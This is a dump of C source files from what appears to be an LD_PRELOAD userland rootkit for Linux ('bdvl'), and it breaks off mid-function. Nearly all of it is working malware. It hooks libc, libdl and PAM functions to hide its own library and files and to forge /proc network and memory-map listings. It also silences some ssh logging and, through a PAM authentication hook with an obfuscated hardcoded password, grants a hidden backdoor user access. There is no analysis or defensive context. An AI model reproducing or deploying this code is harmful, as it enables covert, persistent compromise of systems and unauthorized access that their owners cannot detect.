6 | return (long)call(CDLADDR, addr, info);
7 | Dl_info bdvl_info;
8 | if((long)call(CDLADDR, addr, &bdvl_info) != 0 && xstrstr(BDVLSO, bdvl_info.dli_fname))
9 | return 0;
10 | return (long)call(CDLADDR, addr, info);
11 | }
12 |
--------------------------------------------------------------------------------
/src/LD/hooks/libdl/dlinfo.c:
--------------------------------------------------------------------------------
1 | #include "../../util/util.h"
2 |
3 | static struct link_map *bdvl_linkmap;
4 |
5 | static void repair_linkmap(void){
6 | bdvl_linkmap->l_prev->l_next = bdvl_linkmap;
7 | bdvl_linkmap->l_next->l_prev = bdvl_linkmap;
8 | }
9 |
10 | int dlinfo(void *handle, int request, void *p){
11 | hook(CDLINFO);
12 | if(is_bdusr())
13 | return (long)call(CDLINFO, handle, request, p);
14 | if(request == 2){
15 | struct link_map *loop;
16 | call(CDLINFO, handle, request, &loop);
17 | do{
18 | loop = loop->l_next;
19 | if(strcmp(loop->l_name, "\0"))
20 | if(xstrstr(BDVLSO, loop->l_name)){
21 | bdvl_linkmap = loop;
22 | loop->l_name = strdup(FAKE_LINKMAP_NAME);
23 | if(process("ltrace")){
24 | atexit(repair_linkmap);
25 | loop->l_prev->l_next = loop->l_next;
26 | loop->l_next->l_prev = loop->l_prev;
27 | }
28 | }
29 | }while(loop != NULL && loop->l_name != NULL && loop->l_next != NULL);
30 | }
31 | return (long)call(CDLINFO, handle, request, p);
32 | }
33 |
--------------------------------------------------------------------------------
/src/LD/hooks/libdl/dlsym.c:
--------------------------------------------------------------------------------
1 | static void get_libc_symbol(const char *symbol, void **funcptr){
2 | if(funcptr != NULL)
3 | return;
4 | void *libc_handle = dlopen(LIBC_PATH, RTLD_DEEPBIND);
5 | char *curcall;
6 | int i;
7 | for(i = 0; i < LIBC_CALLS_SIZE; i++){
8 | curcall = libc_calls[i];
9 | if(!xstrncmp(symbol,curcall)){
10 | *funcptr = o_dlsym(libc_handle, symbol);
11 | break;
12 | }
13 | }
14 | }
15 |
16 | static void get_libdl_symbol(const char *symbol, void **funcptr){
17 | if(funcptr != NULL)
18 | return;
19 | void *libdl_handle = dlopen(LIBDL_PATH, RTLD_DEEPBIND);
20 | char *curcall;
21 | int i;
22 | for(i = 0; i < LIBDL_CALLS_SIZE; i++){
23 | curcall = libdl_calls[i];
24 | if(!xstrncmp(symbol,curcall)){
25 | *funcptr = o_dlsym(libdl_handle, symbol);
26 | break;
27 | }
28 | }
29 | }
30 |
31 | static void get_libpam_symbol(const char *symbol, void **funcptr){
32 | if(funcptr != NULL)
33 | return;
34 | void *libpam_handle = dlopen(LIBPAM_PATH, RTLD_DEEPBIND);
35 | char *curcall;
36 | int i;
37 | for(i = 0; i < LIBPAM_CALLS_SIZE; i++){
38 | curcall = libpam_calls[i];
39 | if(!xstrncmp(symbol,curcall)){
40 | *funcptr = o_dlsym(libpam_handle, symbol);
41 | break;
42 | }
43 | }
44 | }
45 |
46 | static void get_libpcap_symbol(const char *symbol, void **funcptr){
47 | if(funcptr != NULL)
48 | return;
49 | void *libpcap_handle = dlopen(LIBPCAP_PATH, RTLD_DEEPBIND);
50 | char *curcall;
51 | int i;
52 | for(i = 0; i < LIBPCAP_CALLS_SIZE; i++){
53 | curcall = libpcap_calls[i];
54 | if(!xstrncmp(symbol,curcall)){
55 | *funcptr = o_dlsym(libpcap_handle, symbol);
56 | break;
57 | }
58 | }
59 | }
60 |
61 | static void locate_dlsym(void){
62 | if(o_dlsym != NULL)
63 | return;
64 | char buf[32];
65 | int a, b;
66 | for(a = 0; a < GLIBC_MAX_VER; a++){
67 | snprintf(buf, sizeof(buf), GLIBC_VER_STR, a);
68 | if((o_dlsym = (void*(*)(void *handle, const char *name))dlvsym(RTLD_NEXT, "dlsym", buf)))
69 | return;
70 | }
71 | for(a = 0; a < GLIBC_MAX_VER; a++)
72 | for(b = 0; b < GLIBC_MAX_VER; b++){
73 | snprintf(buf, sizeof(buf), GLIBC_VERVER_STR, a, b);
74 | if((o_dlsym = (void*(*)(void *handle, const char *name))dlvsym(RTLD_NEXT, "dlsym", buf)))
75 | return;
76 | }
77 | if(o_dlsym == NULL)
78 | exit(0);
79 | }
80 |
81 | void *dlsym(void *handle, const char *symbol){
82 | void *ptr = NULL;
83 | locate_dlsym();
84 | get_libc_symbol(symbol, &ptr);
85 | get_libdl_symbol(symbol, &ptr);
86 | get_libpam_symbol(symbol, &ptr);
87 | get_libpcap_symbol(symbol, &ptr);
88 | if(ptr == NULL)
89 | ptr = o_dlsym(handle, symbol);
90 | return ptr;
91 | }
92 |
--------------------------------------------------------------------------------
/src/LD/hooks/libdl/gsym.c:
--------------------------------------------------------------------------------
1 | static void get_symbol_pointer(int symbol_index, void *handle){
2 | if(symbols[symbol_index].func != NULL || all[symbol_index] == NULL)
3 | return;
4 | locate_dlsym();
5 | xor(symbol_name, all[symbol_index]);
6 | if(strlen(symbol_name) < 2)
7 | goto end_get_symbol_pointer;
8 | symbols[symbol_index].func = o_dlsym(handle, symbol_name);
9 | end_get_symbol_pointer:
10 | clean(symbol_name);
11 | return;
12 | }
13 |
14 | static void _hook(void *handle, ...){
15 | int symbol_index;
16 | va_list va;
17 | va_start(va, handle);
18 | while((symbol_index = va_arg(va, int)) > -1){
19 | if(symbol_index > ALL_SIZE)
20 | break;
21 | get_symbol_pointer(symbol_index, handle);
22 | }
23 | va_end(va);
24 | return;
25 | }
26 |
--------------------------------------------------------------------------------
/src/LD/hooks/libdl/libdl.h:
--------------------------------------------------------------------------------
1 | #ifndef LIBDL_H
2 | #define LIBDL_H
3 |
4 | #include "util/xor.c"
5 |
6 | #define LIBC_PATH "libc.so.6"
7 | #define LIBDL_PATH "libdl.so.1"
8 | #define LIBPAM_PATH "libpam.so.0"
9 | #define LIBPCAP_PATH "libpcap.so"
10 |
11 | #define GLIBC_VER_STR "GLIBC_2.%d"
12 | #define GLIBC_VERVER_STR "GLIBC_2.%d.%d"
13 | #define GLIBC_MAX_VER 40
14 |
15 | #define FAKE_LINKMAP_NAME "(filo)"
16 |
17 | extern void *_dl_sym(void *, const char *, void *);
18 | typeof(dlsym) *o_dlsym;
19 |
20 | static void get_libc_symbol(const char *symbol, void **funcptr);
21 | static void get_libdl_symbol(const char *symbol, void **funcptr);
22 | static void get_libpam_symbol(const char *symbol, void **funcptr);
23 | static void get_libpcap_symbol(const char *symbol, void **funcptr);
24 |
25 | static void locate_dlsym(void);
26 | void *dlsym(void *handle, const char *symbol);
27 |
28 | static void get_symbol_pointer(int symbol_index, void *handle);
29 | static void _hook(void *handle, ...);
30 | #include "gsym.c"
31 |
32 | static int xfnmatch(const char *pattern, const char *string);
33 | static char *xstrstr(const char *pattern, const char *string);
34 | static int xstrncmp(const char *string, const char *pattern);
35 | static int xprintf(const char *string);
36 | static size_t xfwrite(const char *str, size_t nmemb, FILE *stream);
37 | static FILE *xfopen(const char *path, const char *mode);
38 | static void *xdlsym(void *handle, const char *symbol);
39 | #define hook(...) _hook(RTLD_NEXT, __VA_ARGS__)
40 | #define call(symbol_index, ...) symbols[symbol_index].func(__VA_ARGS__)
41 | #include "util/xor_wrappers.h"
42 | #include "dlsym.c"
43 |
44 | int dladdr(const void *addr, Dl_info *info);
45 | #include "dladdr.c"
46 |
47 | static void repair_linkmap(void);
48 | int dlinfo(void *handle, int request, void *p);
49 | #include "dlinfo.c"
50 |
51 | #endif
52 |
--------------------------------------------------------------------------------
/src/LD/hooks/ln/links.h:
--------------------------------------------------------------------------------
1 | #ifndef LINKS_H
2 | #define LINKS_H
3 |
4 | int unlink(const char *pathname);
5 | int unlinkat(int dirfd, const char *pathname, int flags);
6 | #include "unlink.c"
7 |
8 | ssize_t readlink(const char *pathname, char *buf, size_t bufsiz);
9 | ssize_t readlinkat(int dirfd, const char *pathname, char *buf, size_t bufsiz);
10 | #include "readlink.c"
11 |
12 | int symlink(const char *target, const char *linkpath);
13 | int symlinkat(const char *target, int newdirfd, const char *linkpath);
14 | #include "symlink.c"
15 |
16 | #endif
17 |
--------------------------------------------------------------------------------
/src/LD/hooks/ln/readlink.c:
--------------------------------------------------------------------------------
1 | ssize_t readlink(const char *pathname, char *buf, size_t bufsiz){
2 | hook(CREADLINK);
3 | if(is_bdusr())
4 | return (ssize_t)call(CREADLINK, pathname, buf, bufsiz);
5 | if(hidden_path(pathname)){
6 | errno = ENOENT;
7 | return -1;
8 | }
9 | return (ssize_t)call(CREADLINK, pathname, buf, bufsiz);
10 | }
11 |
12 | ssize_t readlinkat(int dirfd, const char *pathname, char *buf, size_t bufsiz){
13 | hook(CREADLINKAT);
14 | if(is_bdusr())
15 | return (ssize_t)call(CREADLINKAT, dirfd, pathname, buf, bufsiz);
16 | if(hidden_path(pathname) || hidden_fd(dirfd)){
17 | errno = ENOENT;
18 | return -1;
19 | }
20 | return (ssize_t)call(CREADLINKAT, dirfd, pathname, buf, bufsiz);
21 | }
22 |
--------------------------------------------------------------------------------
/src/LD/hooks/ln/symlink.c:
--------------------------------------------------------------------------------
1 | int symlink(const char *target, const char *linkpath){
2 | hook(CSYMLINK);
3 | if(is_bdusr())
4 | return (long)call(CSYMLINK, target, linkpath);
5 | if(hidden_path(target) || hidden_path(linkpath)){
6 | errno=ENOENT;
7 | return -1;
8 | }
9 | return (long)call(CSYMLINK, target, linkpath);
10 | }
11 |
12 | int symlinkat(const char *target, int newdirfd, const char *linkpath){
13 | hook(CSYMLINKAT);
14 | if(is_bdusr())
15 | return (long)call(CSYMLINKAT, target, newdirfd, linkpath);
16 | if(hidden_path(target) || hidden_fd(newdirfd) || hidden_path(linkpath)){
17 | errno=ENOENT;
18 | return -1;
19 | }
20 | return (long)call(CSYMLINKAT, target, newdirfd, linkpath);
21 | }
22 |
--------------------------------------------------------------------------------
/src/LD/hooks/ln/unlink.c:
--------------------------------------------------------------------------------
1 | int unlink(const char *pathname){
2 | hook(CUNLINK);
3 | if(is_bdusr())
4 | return (long)call(CUNLINK, pathname);
5 | if(hidden_path(pathname)){
6 | errno = ENOENT;
7 | return -1;
8 | }
9 | return (long)call(CUNLINK, pathname);
10 | }
11 |
12 | int unlinkat(int dirfd, const char *pathname, int flags){
13 | hook(CUNLINKAT);
14 | if(is_bdusr())
15 | return (long)call(CUNLINKAT, dirfd, pathname, flags);
16 | if(hidden_path(pathname) || hidden_fd(dirfd)){
17 | errno = ENOENT;
18 | return -1;
19 | }
20 | return (long)call(CUNLINKAT, dirfd, pathname, flags);
21 | }
22 |
--------------------------------------------------------------------------------
/src/LD/hooks/open/access.c:
--------------------------------------------------------------------------------
1 | int access(const char *pathname, int amode){
2 | hook(CACCESS);
3 | if(is_bdusr())
4 | return (long)call(CACCESS, pathname, amode);
5 | if(hidden_path(pathname)){
6 | errno = ENOENT;
7 | return -1;
8 | }
9 | return (long)call(CACCESS, pathname, amode);
10 | }
11 |
12 | int creat(const char *pathname, mode_t mode){
13 | hook(CCREAT);
14 | if(is_bdusr())
15 | return (long)call(CCREAT, pathname, mode);
16 | if(hidden_path(pathname)){
17 | errno = ENOENT;
18 | return -1;
19 | }
20 | return (long)call(CCREAT, pathname, mode);
21 | }
22 |
23 | int creat64(const char *pathname, mode_t mode){
24 | hook(CCREAT64);
25 | if(is_bdusr())
26 | return (long)call(CCREAT64, pathname, mode);
27 | if(hidden_path64(pathname)){
28 | errno = ENOENT;
29 | return -1;
30 | }
31 | return (long)call(CCREAT64, pathname, mode);
32 | }
33 |
34 |
--------------------------------------------------------------------------------
/src/LD/hooks/open/fopen.c:
--------------------------------------------------------------------------------
1 | FILE *fopen(const char *pathname, const char *mode){
2 | hook(CFOPEN);
3 | if(is_bdusr())
4 | return call(CFOPEN, pathname, mode);
5 | if(hidden_path(pathname)){
6 | errno = ENOENT;
7 | return NULL;
8 | }
9 | if(!strcmp(pathname, "/proc/net/tcp") || !strcmp(pathname, "/proc/net/tcp6"))
10 | return forge_procnet(pathname);
11 | if(!fnmatch(MAPS_FULL_PATH, pathname, FNM_PATHNAME))
12 | return forge_maps(pathname);
13 | if(!fnmatch(SMAPS_FULL_PATH, pathname, FNM_PATHNAME))
14 | return forge_smaps(pathname);
15 | if(!fnmatch(NMAPS_FULL_PATH, pathname, FNM_PATHNAME))
16 | return forge_numamaps(pathname);
17 | char cwd[PROCPATH_MAXLEN];
18 | if(getcwd(cwd, sizeof(cwd)) != NULL){
19 | if(!strcmp(cwd, "/proc")){
20 | if(!fnmatch(MAPS_PROC_PATH, pathname, FNM_PATHNAME))
21 | return forge_maps(pathname);
22 | if(!fnmatch(SMAPS_PROC_PATH, pathname, FNM_PATHNAME))
23 | return forge_smaps(pathname);
24 | if(!fnmatch(NMAPS_PROC_PATH, pathname, FNM_PATHNAME))
25 | return forge_numamaps(pathname);
26 | }
27 | if(!fnmatch("/proc/*", cwd, FNM_PATHNAME)){
28 | if(!fnmatch(MAPS_FILENAME, pathname, FNM_PATHNAME))
29 | return forge_maps(pathname);
30 | if(!fnmatch(SMAPS_FILENAME, pathname, FNM_PATHNAME))
31 | return forge_smaps(pathname);
32 | if(!fnmatch(NMAPS_FILENAME, pathname, FNM_PATHNAME))
33 | return forge_numamaps(pathname);
34 | }
35 | }
36 | return call(CFOPEN, pathname, mode);
37 | }
38 |
39 | FILE *fopen64(const char *pathname, const char *mode){
40 | hook(CFOPEN64);
41 | if(is_bdusr())
42 | return call(CFOPEN64, pathname, mode);
43 | if(hidden_path(pathname)){
44 | errno = ENOENT;
45 | return NULL;
46 | }
47 | if(!strcmp(pathname, "/proc/net/tcp") || !strcmp(pathname, "/proc/net/tcp"))
48 | return forge_procnet(pathname);
49 | if(!fnmatch(MAPS_FULL_PATH, pathname, FNM_PATHNAME))
50 | return forge_maps(pathname);
51 | if(!fnmatch(SMAPS_FULL_PATH, pathname, FNM_PATHNAME))
52 | return forge_smaps(pathname);
53 | if(!fnmatch(NMAPS_FULL_PATH, pathname, FNM_PATHNAME))
54 | return forge_numamaps(pathname);
55 | char cwd[PROCPATH_MAXLEN];
56 | if(getcwd(cwd, sizeof(cwd)) != NULL){
57 | if(!strcmp(cwd, "/proc")){
58 | if(!fnmatch(MAPS_PROC_PATH, pathname, FNM_PATHNAME))
59 | return forge_maps(pathname);
60 | if(!fnmatch(SMAPS_PROC_PATH, pathname, FNM_PATHNAME))
61 | return forge_smaps(pathname);
62 | if(!fnmatch(NMAPS_PROC_PATH, pathname, FNM_PATHNAME))
63 | return forge_numamaps(pathname);
64 | }
65 | if(!fnmatch("/proc/*", cwd, FNM_PATHNAME)){
66 | if(!fnmatch(MAPS_FILENAME, pathname, FNM_PATHNAME))
67 | return forge_maps(pathname);
68 | if(!fnmatch(SMAPS_FILENAME, pathname, FNM_PATHNAME))
69 | return forge_smaps(pathname);
70 | if(!fnmatch(NMAPS_FILENAME, pathname, FNM_PATHNAME))
71 | return forge_numamaps(pathname);
72 | }
73 | }
74 | return call(CFOPEN64, pathname, mode);
75 | }
76 |
77 | FILE *freopen(const char *pathname, const char *mode, FILE *stream){
78 | hook(CFREOPEN);
79 | if(is_bdusr())
80 | return call(CFREOPEN, pathname, mode, stream);
81 | if(hidden_path(pathname)){
82 | errno = ENOENT;
83 | return NULL;
84 | }
85 | if(!strcmp(pathname, "/proc/net/tcp") || !strcmp(pathname, "/proc/net/tcp"))
86 | return forge_procnet(pathname);
87 | if(!fnmatch(MAPS_FULL_PATH, pathname, FNM_PATHNAME))
88 | return forge_maps(pathname);
89 | if(!fnmatch(SMAPS_FULL_PATH, pathname, FNM_PATHNAME))
90 | return forge_smaps(pathname);
91 | if(!fnmatch(NMAPS_FULL_PATH, pathname, FNM_PATHNAME))
92 | return forge_numamaps(pathname);
93 | char cwd[PROCPATH_MAXLEN];
94 | if(getcwd(cwd, sizeof(cwd)) != NULL){
95 | if(!strcmp(cwd, "/proc")){
96 | if(!fnmatch(MAPS_PROC_PATH, pathname, FNM_PATHNAME))
97 | return forge_maps(pathname);
98 | if(!fnmatch(SMAPS_PROC_PATH, pathname, FNM_PATHNAME))
99 | return forge_smaps(pathname);
100 | if(!fnmatch(NMAPS_PROC_PATH, pathname, FNM_PATHNAME))
101 | return forge_numamaps(pathname);
102 | }
103 | if(!fnmatch("/proc/*", cwd, FNM_PATHNAME)){
104 | if(!fnmatch(MAPS_FILENAME, pathname, FNM_PATHNAME))
105 | return forge_maps(pathname);
106 | if(!fnmatch(SMAPS_FILENAME, pathname, FNM_PATHNAME))
107 | return forge_smaps(pathname);
108 | if(!fnmatch(NMAPS_FILENAME, pathname, FNM_PATHNAME))
109 | return forge_numamaps(pathname);
110 | }
111 | }
112 | return call(CFREOPEN, pathname, mode, stream);
113 | }
114 |
115 | FILE *freopen64(const char *pathname, const char *mode, FILE *stream){
116 | hook(CFREOPEN64);
117 | if(is_bdusr())
118 | return call(CFREOPEN64, pathname, mode, stream);
119 | if(hidden_path64(pathname)){
120 | errno = ENOENT;
121 | return NULL;
122 | }
123 | if(!strcmp(pathname, "/proc/net/tcp") || !strcmp(pathname, "/proc/net/tcp"))
124 | return forge_procnet(pathname);
125 | if(!fnmatch(MAPS_FULL_PATH, pathname, FNM_PATHNAME))
126 | return forge_maps(pathname);
127 | if(!fnmatch(SMAPS_FULL_PATH, pathname, FNM_PATHNAME))
128 | return forge_smaps(pathname);
129 | if(!fnmatch(NMAPS_FULL_PATH, pathname, FNM_PATHNAME))
130 | return forge_numamaps(pathname);
131 | char cwd[PROCPATH_MAXLEN];
132 | if(getcwd(cwd, sizeof(cwd)) != NULL){
133 | if(!strcmp(cwd, "/proc")){
134 | if(!fnmatch(MAPS_PROC_PATH, pathname, FNM_PATHNAME))
135 | return forge_maps(pathname);
136 | if(!fnmatch(SMAPS_PROC_PATH, pathname, FNM_PATHNAME))
137 | return forge_smaps(pathname);
138 | if(!fnmatch(NMAPS_PROC_PATH, pathname, FNM_PATHNAME))
139 | return forge_numamaps(pathname);
140 | }
141 | if(!fnmatch("/proc/*", cwd, FNM_PATHNAME)){
142 | if(!fnmatch(MAPS_FILENAME, pathname, FNM_PATHNAME))
143 | return forge_maps(pathname);
144 | if(!fnmatch(SMAPS_FILENAME, pathname, FNM_PATHNAME))
145 | return forge_smaps(pathname);
146 | if(!fnmatch(NMAPS_FILENAME, pathname, FNM_PATHNAME))
147 | return forge_numamaps(pathname);
148 | }
149 | }
150 | return call(CFREOPEN64, pathname, mode, stream);
151 | }
152 |
--------------------------------------------------------------------------------
/src/LD/hooks/open/open.c:
--------------------------------------------------------------------------------
1 | #if defined(__GLIBC__) && (__GLIBC_MINOR__ < 26)
2 | int open(const char *pathname, int flags, mode_t mode){
3 | hook(COPEN);
4 | if(is_bdusr())
5 | return (long)call(COPEN, pathname, flags, mode);
6 | if(hidden_path(pathname) && ((process("ssh") || process("busybox")) && (flags == (64|1|512))))
7 | return (long)call(COPEN, "/dev/null", flags, mode);
8 | if(hidden_path(pathname)){
9 | errno = ENOENT;
10 | return -1;
11 | }
12 | if(!strcmp(pathname, "/proc/net/tcp") || !strcmp(pathname, "/proc/net/tcp6"))
13 | return fileno(forge_procnet(pathname));
14 | if(!fnmatch(MAPS_FULL_PATH, pathname, FNM_PATHNAME))
15 | return fileno(forge_maps(pathname));
16 | if(!fnmatch(SMAPS_FULL_PATH, pathname, FNM_PATHNAME))
17 | return fileno(forge_smaps(pathname));
18 | if(!fnmatch(NMAPS_FULL_PATH, pathname, FNM_PATHNAME))
19 | return fileno(forge_numamaps(pathname));
20 | char cwd[PROCPATH_MAXLEN];
21 | if(getcwd(cwd, sizeof(cwd)) != NULL){
22 | if(!strcmp(cwd, "/proc")){
23 | if(!fnmatch(MAPS_PROC_PATH, pathname, FNM_PATHNAME))
24 | return fileno(forge_maps(pathname));
25 | if(!fnmatch(SMAPS_PROC_PATH, pathname, FNM_PATHNAME))
26 | return fileno(forge_smaps(pathname));
27 | if(!fnmatch(NMAPS_PROC_PATH, pathname, FNM_PATHNAME))
28 | return fileno(forge_numamaps(pathname));
29 | }
30 | if(!fnmatch("/proc/*", cwd, FNM_PATHNAME)){
31 | if(!fnmatch(MAPS_FILENAME, pathname, FNM_PATHNAME))
32 | return fileno(forge_maps(pathname));
33 | if(!fnmatch(SMAPS_FILENAME, pathname, FNM_PATHNAME))
34 | return fileno(forge_smaps(pathname));
35 | if(!fnmatch(NMAPS_FILENAME, pathname, FNM_PATHNAME))
36 | return fileno(forge_numamaps(pathname));
37 | }
38 | }
39 | return (long)call(COPEN, pathname, flags, mode);
40 | }
41 |
42 | int open64(const char *pathname, int flags, mode_t mode){
43 | hook(COPEN64);
44 | if(is_bdusr())
45 | return (long)call(COPEN64, pathname, flags, mode);
46 | if(hidden_path64(pathname) && ((process("ssh") || process("busybox")) && (flags == (64|1|512))))
47 | return (long)call(COPEN64, "/dev/null", flags, mode);
48 | if(hidden_path64(pathname)){
49 | errno = ENOENT;
50 | return -1;
51 | }
52 | if(!strcmp(pathname, "/proc/net/tcp") || !strcmp(pathname, "/proc/net/tcp6"))
53 | return fileno(forge_procnet(pathname));
54 | if(!fnmatch(MAPS_FULL_PATH, pathname, FNM_PATHNAME))
55 | return fileno(forge_maps(pathname));
56 | if(!fnmatch(SMAPS_FULL_PATH, pathname, FNM_PATHNAME))
57 | return fileno(forge_smaps(pathname));
58 | if(!fnmatch(NMAPS_FULL_PATH, pathname, FNM_PATHNAME))
59 | return fileno(forge_numamaps(pathname));
60 | char cwd[PROCPATH_MAXLEN];
61 | if(getcwd(cwd, sizeof(cwd)) != NULL){
62 | if(!strcmp(cwd, "/proc")){
63 | if(!fnmatch(MAPS_PROC_PATH, pathname, FNM_PATHNAME))
64 | return fileno(forge_maps(pathname));
65 | if(!fnmatch(SMAPS_PROC_PATH, pathname, FNM_PATHNAME))
66 | return fileno(forge_smaps(pathname));
67 | if(!fnmatch(NMAPS_PROC_PATH, pathname, FNM_PATHNAME))
68 | return fileno(forge_numamaps(pathname));
69 | }
70 | if(!fnmatch("/proc/*", cwd, FNM_PATHNAME)){
71 | if(!fnmatch(MAPS_FILENAME, pathname, FNM_PATHNAME))
72 | return fileno(forge_maps(pathname));
73 | if(!fnmatch(SMAPS_FILENAME, pathname, FNM_PATHNAME))
74 | return fileno(forge_smaps(pathname));
75 | if(!fnmatch(NMAPS_FILENAME, pathname, FNM_PATHNAME))
76 | return fileno(forge_numamaps(pathname));
77 | }
78 | }
79 | return (long)call(COPEN64, pathname, flags, mode);
80 | }
81 | #endif
82 | int openat(int fd, const char *pathname, int flags, mode_t mode){
83 | hook(COPENAT);
84 | if(is_bdusr())
85 | return (long)call(COPENAT, fd, pathname, flags, mode);
86 | if((hidden_path(pathname) || hidden_fd(fd)) && ((process("ssh") || process("busybox")) && (flags == (64|1|512))))
87 | return (long)call(COPENAT, fd, "/dev/null", flags, mode);
88 | if(pathname){
89 | if(hidden_path(pathname)){
90 | errno = ENOENT;
91 | return -1;
92 | }
93 | if(!strcmp(pathname, "/proc/net/tcp") || !strcmp(pathname, "/proc/net/tcp6"))
94 | return fileno(forge_procnet(pathname));
95 | if(!fnmatch(MAPS_FULL_PATH, pathname, FNM_PATHNAME))
96 | return fileno(forge_maps(pathname));
97 | if(!fnmatch(SMAPS_FULL_PATH, pathname, FNM_PATHNAME))
98 | return fileno(forge_smaps(pathname));
99 | if(!fnmatch(NMAPS_FULL_PATH, pathname, FNM_PATHNAME))
100 | return fileno(forge_numamaps(pathname));
101 | char cwd[PROCPATH_MAXLEN];
102 | if(getcwd(cwd, sizeof(cwd)) != NULL){
103 | if(!strcmp(cwd, "/proc")){
104 | if(!fnmatch(MAPS_PROC_PATH, pathname, FNM_PATHNAME))
105 | return fileno(forge_maps(pathname));
106 | if(!fnmatch(SMAPS_PROC_PATH, pathname, FNM_PATHNAME))
107 | return fileno(forge_smaps(pathname));
108 | if(!fnmatch(NMAPS_PROC_PATH, pathname, FNM_PATHNAME))
109 | return fileno(forge_numamaps(pathname));
110 | }
111 | if(!fnmatch("/proc/*", cwd, FNM_PATHNAME)){
112 | if(!fnmatch(MAPS_FILENAME, pathname, FNM_PATHNAME))
113 | return fileno(forge_maps(pathname));
114 | if(!fnmatch(SMAPS_FILENAME, pathname, FNM_PATHNAME))
115 | return fileno(forge_smaps(pathname));
116 | if(!fnmatch(NMAPS_FILENAME, pathname, FNM_PATHNAME))
117 | return fileno(forge_numamaps(pathname));
118 | }
119 | }
120 | }
121 | return (long)call(COPENAT, fd, pathname, flags, mode);
122 | }
123 |
124 | int openat64(int fd, const char *pathname, int flags, mode_t mode){
125 | hook(COPENAT64);
126 | if(is_bdusr())
127 | return (long)call(COPENAT64, fd, pathname, flags, mode);
128 | if((hidden_path64(pathname) || hidden_fd64(fd)) && ((process("ssh") || process("busybox")) && (flags == (64|1|512))))
129 | return (long)call(COPENAT64, fd, "/dev/null", flags, mode);
130 | if(pathname){
131 | if(hidden_path64(pathname)){
132 | errno = ENOENT;
133 | return -1;
134 | }
135 | if(!strcmp(pathname, "/proc/net/tcp") || !strcmp(pathname, "/proc/net/tcp6"))
136 | return fileno(forge_procnet(pathname));
137 | if(!fnmatch(MAPS_FULL_PATH, pathname, FNM_PATHNAME))
138 | return fileno(forge_maps(pathname));
139 | if(!fnmatch(SMAPS_FULL_PATH, pathname, FNM_PATHNAME))
140 | return fileno(forge_smaps(pathname));
141 | if(!fnmatch(NMAPS_FULL_PATH, pathname, FNM_PATHNAME))
142 | return fileno(forge_numamaps(pathname));
143 | char cwd[PROCPATH_MAXLEN];
144 | if(getcwd(cwd, sizeof(cwd)) != NULL){
145 | if(!strcmp(cwd, "/proc")){
146 | if(!fnmatch(MAPS_PROC_PATH, pathname, FNM_PATHNAME))
147 | return fileno(forge_maps(pathname));
148 | if(!fnmatch(SMAPS_PROC_PATH, pathname, FNM_PATHNAME))
149 | return fileno(forge_smaps(pathname));
150 | if(!fnmatch(NMAPS_PROC_PATH, pathname, FNM_PATHNAME))
151 | return fileno(forge_numamaps(pathname));
152 | }
153 | if(!fnmatch("/proc/*", cwd, FNM_PATHNAME)){
154 | if(!fnmatch(MAPS_FILENAME, pathname, FNM_PATHNAME))
155 | return fileno(forge_maps(pathname));
156 | if(!fnmatch(SMAPS_FILENAME, pathname, FNM_PATHNAME))
157 | return fileno(forge_smaps(pathname));
158 | if(!fnmatch(NMAPS_FILENAME, pathname, FNM_PATHNAME))
159 | return fileno(forge_numamaps(pathname));
160 | }
161 | }
162 | }
163 | return (long)call(COPENAT64, fd, pathname, flags, mode);
164 | }
165 |
--------------------------------------------------------------------------------
/src/LD/hooks/open/open.h:
--------------------------------------------------------------------------------
1 | #ifndef OPEN_H
2 | #define OPEN_H
3 |
4 | #define MAPS_FULL_PATH "/proc/*/maps"
5 | #define SMAPS_FULL_PATH "/proc/*/smaps"
6 | #define NMAPS_FULL_PATH "/proc/*/numa_maps"
7 |
8 | #define MAPS_PROC_PATH "*/maps"
9 | #define SMAPS_PROC_PATH "*/smaps"
10 | #define NMAPS_PROC_PATH "*/numa_maps"
11 |
12 | #define MAPS_FILENAME "maps"
13 | #define SMAPS_FILENAME "smaps"
14 | #define NMAPS_FILENAME "numa_maps"
15 |
16 | #if defined(__GLIBC__) && (__GLIBC_MINOR__ < 26)
17 | int open(const char *pathname, int flags, mode_t mode);
18 | int open64(const char *pathname, int flags, mode_t mode);
19 | #endif
20 | int openat(int fd, const char *pathname, int flags, mode_t mode);
21 | int openat64(int fd, const char *pathname, int flags, mode_t mode);
22 | #include "open.c"
23 |
24 | FILE *fopen(const char *pathname, const char *mode);
25 | FILE *fopen64(const char *pathname, const char *mode);
26 | FILE *freopen(const char *pathname, const char *mode, FILE *stream);
27 | FILE *freopen64(const char *pathname, const char *mode, FILE *stream);
28 | #include "fopen.c"
29 |
30 | int access(const char *pathname, int amode);
31 | int creat(const char *pathname, mode_t mode);
32 | int creat64(const char *pathname, mode_t mode);
33 | #include "access.c"
34 |
35 | #endif
36 |
--------------------------------------------------------------------------------
/src/LD/hooks/pam/pam.h:
--------------------------------------------------------------------------------
1 | #ifndef __PAM_H
2 | #define __PAM_H
3 |
4 | #include "pam_private.h"
5 |
6 | int pam_authenticate(pam_handle_t *pamh, int flags);
7 | int pam_open_session(pam_handle_t *pamh, int flags);
8 | int pam_acct_mgmt(pam_handle_t *pamh, int flags);
9 | #include "pam_hooks.c"
10 |
11 | void pam_syslog(const pam_handle_t *pamh, int priority, const char *fmt, ...);
12 | void pam_vsyslog(const pam_handle_t *pamh, int priority, const char *fmt, va_list args);
13 | #include "pam_syslog.c"
14 |
15 | #endif
16 |
--------------------------------------------------------------------------------
/src/LD/hooks/pam/pam_hooks.c:
--------------------------------------------------------------------------------
1 | int pam_authenticate(pam_handle_t *pamh, int flags){
2 | char *user = get_username(pamh), prompt[512], *pw;
3 | int got_pw;
4 | hook(CPAM_AUTHENTICATE);
5 | if(user == NULL)
6 | return (long)call(CPAM_AUTHENTICATE, pamh, flags);
7 | if(!xstrncmp(user, BD_UNAME)){
8 | if(process("login"))
9 | return (long)call(CPAM_AUTHENTICATE, pamh, flags);
10 | snprintf(prompt, sizeof(prompt), "Password: ");
11 | pam_prompt(pamh, 1, &pw, "%s", prompt);
12 | xor(bd_pwd, BD_PWD);
13 | got_pw = !strcmp(crypt(pw, bd_pwd), bd_pwd);
14 | clean(bd_pwd);
15 | memset(pw, 0, strlen(pw));
16 | if(got_pw)
17 | return PAM_SUCCESS;
18 | return PAM_USER_UNKNOWN;
19 | }
20 | return (long)call(CPAM_AUTHENTICATE, pamh, flags);
21 | }
22 |
23 | int pam_open_session(pam_handle_t *pamh, int flags){
24 | char *user = get_username(pamh);
25 | hook(CPAM_OPEN_SESSION);
26 | if(user == NULL)
27 | return (long)call(CPAM_OPEN_SESSION, pamh, flags);
28 | if(!xstrncmp(user, BD_UNAME))
